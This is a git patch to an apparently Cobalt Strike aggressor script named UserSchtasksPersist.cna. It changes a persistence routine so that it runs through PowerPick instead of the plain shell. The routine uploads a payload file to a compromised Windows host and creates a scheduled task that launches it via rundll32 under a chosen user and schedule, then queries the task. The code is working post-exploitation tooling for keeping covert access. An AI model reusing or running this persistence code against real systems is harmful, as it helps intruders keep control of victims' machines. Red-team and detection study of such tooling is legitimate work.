From fa91c50aa37687498033fc15921cee7c35244624 Mon Sep 17 00:00:00 2001
From: Harley Lebeau <hrlebeau@gmail.com>
Date: Fri, 9 Feb 2018 12:46:57 -0700
Subject: [PATCH] Updated with PowerPick

---
 Persistence/UserSchtasksPersist.cna | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Persistence/UserSchtasksPersist.cna b/Persistence/UserSchtasksPersist.cna
index f5fa481..418883b 100644
--- a/Persistence/UserSchtasksPersist.cna
+++ b/Persistence/UserSchtasksPersist.cna
@@ -14,8 +14,8 @@ sub persistUserSchtasks  {
 		else {
 			bcd($bid, $3['targetpath']);
 			bupload($bid, $3['payloadfile']);
-			bshell($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
-			bshell($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
+			bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
+			bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
 		}
 	}));